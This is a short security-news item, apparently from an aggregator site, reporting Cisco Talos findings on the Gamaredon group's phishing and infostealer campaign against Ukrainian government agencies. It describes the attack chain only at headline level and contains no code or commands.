Security News > 2022 > September > Russian Gamaredon Hackers Target Ukrainian Government Using Info-Stealing Malware
An ongoing espionage campaign operated by the Russia-linked Gamaredon group is targeting employees of Ukrainian government, defense, and law enforcement agencies with a piece of custom-made information stealing malware.
"The adversary is using phishing documents containing lures related to the Russian invasion of Ukraine," Cisco Talos researchers Asheer Malhotra and Guilherme Venere said in a technical write-up shared with The Hacker News.
Active since 2013, Gamaredon - also known as Actinium, Armageddon, Primitive Bear, Shuckworm, and Trident Ursa - has been linked to numerous attacks aimed at Ukrainian entities in the aftermath of Russia's military invasion of Ukraine in late February 2022.
The LNK files seemingly reference intelligence briefings related to the Russian invasion of Ukraine to trick unsuspecting victims into opening the shortcuts, resulting in the execution of a PowerShell beacon script that ultimately paves the way for next-stage payloads.
This includes another PowerShell script that's used to provide persistent access to compromised system and deliver additional malware, including a new malware capable of plundering files from the machine as well as any removable drive connected to it.
"The infostealer is a dual-purpose malware that includes capabilities for exfiltrating specific file types and deploying additional binary and script-based payloads on an infected endpoint," the researchers said, adding it may be a component of the Giddome backdoor family.
News URL
https://thehackernews.com/2022/09/russian-gamaredon-hackers-target.html
Related news
- Pro-Ukrainian Hackers Strike Russian State TV on Putin's Birthday (source)
- Russian Espionage Group Targets Ukrainian Military with Malware via Telegram (source)
- Russian Hackers Exploit New NTLM Flaw to Deploy RAT Malware via Phishing Emails (source)
- New HTML Smuggling Campaign Delivers DCRat Malware to Russian-Speaking Users (source)
- FIN7 hackers launch deepfake nude “generator” sites to spread malware (source)
- Microsoft and DOJ disrupt Russian FSB hackers' attack infrastructure (source)
- 100+ domains seized to stymie Russian Star Blizzard hackers (source)
- Ukrainian pleads guilty to operating Raccoon Stealer malware (source)
- N. Korean Hackers Use Fake Interviews to Infect Developers with Cross-Platform Malware (source)
- US, UK warn of Russian APT29 hackers targeting Zimbra, TeamCity servers (source)